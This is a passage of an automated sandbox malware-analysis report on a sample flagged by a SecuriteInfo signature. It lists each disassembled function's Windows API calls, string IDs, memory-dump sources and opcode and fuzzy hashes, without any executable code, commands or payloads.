                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Show$Enable$MessageSend
                              • String ID:
                              • API String ID: 642888154-0
                              • Opcode ID: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                              • Instruction ID: 565b1416b449dda97e7e8ad3bca31999bb646f53bf8f6db01da499c645ec543d
                              • Opcode Fuzzy Hash: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                              • Instruction Fuzzy Hash: D0417F31604641EFDB22CF28C499B957BE4FF05324F5842B9FA588F6E2C731A846DB61
                              Function 008F73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32(?,?,?,?,?,?,008F5134,?,?,00000000,00000001), ref: 008F73BF
                                • Part of subcall function 008F3C94: GetWindowRect.USER32(?,?), ref: 008F3CA7
                              • GetDesktopWindow.USER32 ref: 008F73E9
                              • GetWindowRect.USER32(00000000), ref: 008F73F0
                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008F7422
                                • Part of subcall function 008E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                              • GetCursorPos.USER32(?), ref: 008F744E
                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008F74AC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                              • String ID:
                              • API String ID: 4137160315-0
                              • Opcode ID: 70878cb5852f0eaeb40f62bb09e1493810bbb9537b2fcb98d8e539c8df08e38d
                              • Instruction ID: 2effba4343483ca912074178f4cf5b938a87c5472b501b071bfec36aa33e032c
                              • Opcode Fuzzy Hash: 70878cb5852f0eaeb40f62bb09e1493810bbb9537b2fcb98d8e539c8df08e38d
                              • Instruction Fuzzy Hash: 3731C372508309AFD720DF24D849E6ABBE9FF99314F000919F588D7191CA30EA09CB96
                              Function 008D8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D8608
                                • Part of subcall function 008D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D8612
                                • Part of subcall function 008D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D8621
                                • Part of subcall function 008D85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008D8628
                                • Part of subcall function 008D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D863E
                              • GetLengthSid.ADVAPI32(?,00000000,008D8977), ref: 008D8DAC
                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008D8DB8
                              • HeapAlloc.KERNEL32(00000000), ref: 008D8DBF
                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 008D8DD8
                              • GetProcessHeap.KERNEL32(00000000,00000000,008D8977), ref: 008D8DEC
                              • HeapFree.KERNEL32(00000000), ref: 008D8DF3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                              • String ID:
                              • API String ID: 3008561057-0
                              • Opcode ID: 076a3f5cebb504edb0c556e483315160af4aca8a8d7e5e28365e342316c9a20d
                              • Instruction ID: 160df05ceaf3ff4484c9e0236cbcf8be39cce4e16c6ea5139ddb76ad194db832
                              • Opcode Fuzzy Hash: 076a3f5cebb504edb0c556e483315160af4aca8a8d7e5e28365e342316c9a20d
                              • Instruction Fuzzy Hash: 1911DC31514604FFDB609FA4CC18BAE7BBAFF54315F10422AE885D3290CB32AA40DB60
                              Function 008D8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008D8B2A
                              • OpenProcessToken.ADVAPI32(00000000), ref: 008D8B31
                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008D8B40
                              • CloseHandle.KERNEL32(00000004), ref: 008D8B4B
                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008D8B7A
                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 008D8B8E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                              • String ID:
                              • API String ID: 1413079979-0
                              • Opcode ID: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                              • Instruction ID: c74699a98912e11c1d451ef48ff50fffcb2b7772ee0a69d6780e0329ec36678e
                              • Opcode Fuzzy Hash: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                              • Instruction Fuzzy Hash: F2114AB2504209EFDB118FA4DD49FDA7BA9FF08714F044166FA04E2160C6719E60AB61
                              Function 0090C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0088134D
                                • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088135C
                                • Part of subcall function 008812F3: BeginPath.GDI32(?), ref: 00881373
                                • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088139C
                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0090C1C4
                              • LineTo.GDI32(00000000,00000003,?), ref: 0090C1D8
                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0090C1E6
                              • LineTo.GDI32(00000000,00000000,?), ref: 0090C1F6
                              • EndPath.GDI32(00000000), ref: 0090C206
                              • StrokePath.GDI32(00000000), ref: 0090C216
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                              • String ID:
                              • API String ID: 43455801-0
                              • Opcode ID: ce98479c4fab7837663ca0d2d22fd6c3feebe60417b4c29952133d6eda68470b
                              • Instruction ID: 850b8316c13ba154ec8f1deac25e582e43b9bd2ee6d3512912b57753274d102e
                              • Opcode Fuzzy Hash: ce98479c4fab7837663ca0d2d22fd6c3feebe60417b4c29952133d6eda68470b
                              • Instruction Fuzzy Hash: 09111BB640810CBFDF119F94DC88FAA7FADEF09354F048021BA188A5A1C7719E55EBA0
                              Function 008A03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A03D3
                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 008A03DB
                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A03E6
                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A03F1
                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 008A03F9
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008A0401
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Virtual
                              • String ID:
                              • API String ID: 4278518827-0
                              • Opcode ID: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                              • Instruction ID: f28b384e10350ffd9a44f37633fc6fa819085a694c9beae79b76f30df141b19a
                              • Opcode Fuzzy Hash: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                              • Instruction Fuzzy Hash: 35016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                              Function 008E568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E569B
                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008E56B1
                              • GetWindowThreadProcessId.USER32(?,?), ref: 008E56C0
                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56CF
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56D9
                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56E0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                              • String ID:
                              • API String ID: 839392675-0
                              • Opcode ID: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                              • Instruction ID: d8d3bb6daed54b92c467a2159ad401ede001c690ed63d35edf500b53831c2a6b
                              • Opcode Fuzzy Hash: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                              • Instruction Fuzzy Hash: BAF01D32259558BFE7315BA29C1DEAB7B7CEBC6B11F000169FA04D14609AA11B0196B5
                              Function 008E74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • InterlockedExchange.KERNEL32(?,?), ref: 008E74E5
                              • EnterCriticalSection.KERNEL32(?,?,00891044,?,?), ref: 008E74F6
                              • TerminateThread.KERNEL32(00000000,000001F6,?,00891044,?,?), ref: 008E7503
                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00891044,?,?), ref: 008E7510
                                • Part of subcall function 008E6ED7: CloseHandle.KERNEL32(00000000,?,008E751D,?,00891044,?,?), ref: 008E6EE1
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7523
                              • LeaveCriticalSection.KERNEL32(?,?,00891044,?,?), ref: 008E752A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                              • String ID:
                              • API String ID: 3495660284-0
                              • Opcode ID: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                              • Instruction ID: 07032e2d4dd716a57adb5ebb557492a498593b0f6cb98fb0340c7f0d150ff85d
                              • Opcode Fuzzy Hash: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                              • Instruction Fuzzy Hash: 44F05E3A158B12EFDB212B68FC9C9EB7B2AFF45702B100531F202918B4DB755A51DB90
                              Function 008D8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008D8E7F
                              • UnloadUserProfile.USERENV(?,?), ref: 008D8E8B
                              • CloseHandle.KERNEL32(?), ref: 008D8E94
                              • CloseHandle.KERNEL32(?), ref: 008D8E9C
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008D8EA5
                              • HeapFree.KERNEL32(00000000), ref: 008D8EAC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                              • String ID:
                              • API String ID: 146765662-0
                              • Opcode ID: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                              • Instruction ID: 8f9bbf84d9c719a86ad8372bf59e268435a320e341ca4ea3f4a1b51728f88cc4
                              • Opcode Fuzzy Hash: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                              • Instruction Fuzzy Hash: 3AE0C236018601FFDA115FE1EC1C90ABB79FB89B62B108230F219C1870CB329560EB90
                              Function 008F8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 008F8928
                              • CharUpperBuffW.USER32(?,?), ref: 008F8A37
                              • VariantClear.OLEAUT32(?), ref: 008F8BAF
                                • Part of subcall function 008E7804: VariantInit.OLEAUT32(00000000), ref: 008E7844
                                • Part of subcall function 008E7804: VariantCopy.OLEAUT32(00000000,?), ref: 008E784D
                                • Part of subcall function 008E7804: VariantClear.OLEAUT32(00000000), ref: 008E7859
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                              • API String ID: 4237274167-1221869570
                              • Opcode ID: 7c7e0942392d40a932cb4432a9d6b86288a1bb1be7b223200617263e9b173bc3
                              • Instruction ID: dd277188b70625708b1628fcbf87b11b31500a3048ae9b3794a2c6699be8c30f
                              • Opcode Fuzzy Hash: 7c7e0942392d40a932cb4432a9d6b86288a1bb1be7b223200617263e9b173bc3
                              • Instruction Fuzzy Hash: 62915771608305DFC714EF28C48596ABBE4FF89714F04496EF99ACB262DB30E906CB52
                              Function 008E2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                              • _memset.LIBCMT ref: 008E3077
                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E30A6
                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E3159
                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008E3187
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                              • String ID: 0
                              • API String ID: 4152858687-4108050209
                              • Opcode ID: de514655849193cb98a51628ae507afa10d472d3631ce88a2f39e34667357398
                              • Instruction ID: e7e971594ecd8c0b2f87eb54015f05ebc092ecfee90973de7545b8ad91a5eaaf
                              • Opcode Fuzzy Hash: de514655849193cb98a51628ae507afa10d472d3631ce88a2f39e34667357398
                              • Instruction Fuzzy Hash: 1851B071618380AED7259F29C849A6BB7E8FF97364F040A2DF895D3291DB70CE448753
                              Function 008DDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008DDAC5
                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008DDAFB
                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008DDB0C
                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008DDB8E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorMode$AddressCreateInstanceProc
                              • String ID: DllGetClassObject
                              • API String ID: 753597075-1075368562
                              • Opcode ID: fbf4231685f8d37c04ecf4cd80eeb0a33981f31216d9bdf21a37fc6f35a526f0
                              • Instruction ID: de9e762a70995c1ee1f30afc382ae26b390cf162c0dc517ed6ad7b0900a7ab1a
                              • Opcode Fuzzy Hash: fbf4231685f8d37c04ecf4cd80eeb0a33981f31216d9bdf21a37fc6f35a526f0
                              • Instruction Fuzzy Hash: B5414CB1600309EFDB15CF54C884A9A7BA9FF48364F1582ABAD05DF305D7B1DA44DBA0
                              Function 008E2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008E2CAF
                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008E2CCB
                              • DeleteMenu.USER32(?,00000007,00000000), ref: 008E2D11
                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00946890,00000000), ref: 008E2D5A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$Delete$InfoItem_memset
                              • String ID: 0
                              • API String ID: 1173514356-4108050209
                              • Opcode ID: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                              • Instruction ID: 2ac68c5aef11cf3814ac4e4f3ee0b7d94c8ea95fd0e23b4cdd03a56b8697b4c0
                              • Opcode Fuzzy Hash: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                              • Instruction Fuzzy Hash: 24418D702093859FD724DF29DC44B1ABBA8FF86320F14466DFA65D7291D770E904CB92
                              Function 008FDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                              Download Yara Rule
                              APIs
                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008FDAD9
                                • Part of subcall function 008879AB: _memmove.LIBCMT ref: 008879F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharLower_memmove
                              • String ID: cdecl$none$stdcall$winapi
                              • API String ID: 3425801089-567219261
                              • Opcode ID: 4959330e20f503de0f715752494be7b8a7a512be3748ee21c51d550d4e452e45
                              • Instruction ID: eb16e577993ae86790cda170bb0273fafe040fd8b63bd95524dc82ff83c75186
                              • Opcode Fuzzy Hash: 4959330e20f503de0f715752494be7b8a7a512be3748ee21c51d550d4e452e45
                              • Instruction Fuzzy Hash: 7531A17150421DAFCF14EF68CC819BEB7B5FF05320B108A29EA65D7691CB71E906CB81
                              Function 008D9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008D93F6
                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008D9409
                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 008D9439
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$_memmove$ClassName
                              • String ID: ComboBox$ListBox
                              • API String ID: 365058703-1403004172
                              • Opcode ID: 5ba7926609221bdf0d35ab9847b29ca234136a1d49c66e0b77e449620a13ccd0
                              • Instruction ID: a6adef4e44686b21fe98962b67870ecbaaeb5a71a8f6e80852ecb3ef42ae75d4
                              • Opcode Fuzzy Hash: 5ba7926609221bdf0d35ab9847b29ca234136a1d49c66e0b77e449620a13ccd0
                              • Instruction Fuzzy Hash: B1210471900108AEDB18AB78CC858FFB779FF45364F10421AF961E72E1DB355E0A9610
                              Function 0088410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                              Download Yara Rule
                              APIs
                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008BD5EC
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              • _memset.LIBCMT ref: 0088418D
                              • _wcscpy.LIBCMT ref: 008841E1
                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008841F1
                              Strings
                              Memory Dump Source
